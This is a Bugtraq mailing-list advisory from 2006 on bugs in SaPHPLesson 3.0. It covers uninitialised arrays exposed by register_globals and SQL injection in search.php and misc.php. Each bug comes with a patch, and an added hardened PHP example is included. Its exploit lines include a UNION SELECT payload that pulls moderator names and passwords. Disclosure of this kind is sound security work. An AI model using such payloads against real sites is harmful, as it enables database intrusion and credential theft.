Open Source and information security mailing list archives
 
Date: 4 May 2006 21:09:41 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: SaPHPLesson 3.0 Multbugs


SaPHPLesson 3.0 Multiple Bugs By :-- D3vil-0x1 | Devil-00 --:

	1- Unfiltered array

    	Filename	:- show.php
        Line		:- 102

[code]
$hrow[] = $Row2;[/code]

Fix :-

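Add this code at line [ 11 ] of /show.php :-

	$hrow is never initialised before it is appended to, so a request parameter with the same name can set it first wherever request variables are imported into the global scope (such as with PHP's register_globals setting). We add the code at global scope to fix every unfiltered variable in the code :)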

[code]
$hrow = array();[/code]

Exploit :-

	GET ^
		/lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

	2- Unfiltered array

    	Filename	:- showcat.php
        Line		:- 80

[code]
$Lsnrow[] = $Row;[/code]

Fix :-

Add this code at line [ 11 ] of /showcat.php :-

	We add the code at global scope to fix every unfiltered variable in the code :)

[code]
$Lsnrow = array();[/code]

Exploit :-

	GET ^

    	/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

	3- SQL Injection

    	Filename	:- search.php
        Line		:- Multiple lines

Fix :-

	Replace line 28 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

	Replace line 32 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

	Exploit :-

    	POST ^

    	Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC
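
addslashes() only escapes quote, backslash and NUL characters, so it does not constrain values placed where a column name or sort direction is expected ($Find, $Order, $Trteb). The following is an added example, not part of the original advisory or SaPHPLesson's own code: it allow-lists those identifiers and binds $Word and $Cat as query parameters. The allow-list contents, the function names and the meaning of Cat=All are assumptions.

```php
<?php
// Added example: hardened form of the search.php query (not SaPHPLesson code).
// Assumption: allow-list entries are illustrative; only lesstitle and lessid
// are named in the advisory.
const FIND_COLUMNS  = ['lesstitle'];            // columns that may be searched
const ORDER_COLUMNS = ['lessid', 'lesstitle'];  // columns that may be sorted on

// Identifiers cannot be bound as parameters, so accept only exact matches.
function pick(string $value, array $allowed, string $default): string
{
    return in_array($value, $allowed, true) ? $value : $default;
}

// Returns [sql, params] ready for a prepared statement.
function build_search(array $post): array
{
    // Treat array-valued or missing fields as empty strings.
    $str = fn(string $k): string => is_string($post[$k] ?? null) ? $post[$k] : '';

    $find  = pick($str('Find'),  FIND_COLUMNS,  'lesstitle');
    $order = pick($str('Order'), ORDER_COLUMNS, 'lessid');
    $dir   = pick(strtoupper($str('Trteb')), ['ASC', 'DESC'], 'DESC');

    $sql    = "select * from less,forums where less.Hidden!=1"
            . " and BINARY less.$find REGEXP ?";
    $params = [$str('Word')];

    $cat = $str('Cat');
    if ($cat !== '' && $cat !== 'All') {   // assumption: 'All' = no category filter
        $sql     .= " and less.forumno = ?";
        $params[] = (int)$cat;
    }
    $sql .= " and forums.id=less.forumno order by $order $dir";
    return [$sql, $params];
}

// Constructed input, abridged from the POST body shown above.
[$sql, $params] = build_search([
    'Word' => 'a', 'Find' => 'lesstitle UNION ALL SELECT null FROM modretor/*',
    'Cat'  => 'All', 'Order' => 'lessid', 'Trteb' => 'DESC',
]);
echo $sql, "\n";   // the rejected Find value is replaced by the default column

// With a PDO connection $pdo (assumed to exist):
// $st = $pdo->prepare($sql); $st->execute($params);
```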

/---------------------------------------------------------/

	4- SQL Injection

    	Filename	:- misc.php
        Line		:- 64

Fix :-
	Replace lines 62 & 63 with this code

[code]
$LID  = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

	5- Unfiltered array

    	Filename	:- index.php
        Line		:- 24

[code]
$rows[] = $Row;[/code]

Fix :-

Add this code at line [ 11 ] of /index.php :-

	We add the code at global scope to fix every unfiltered variable in the code :)

[code]
$rows = array();
$hrow = array();[/code]

Exploit :-

	GET ^

    	/saphplesson/index.php?rows=D3vil-x01

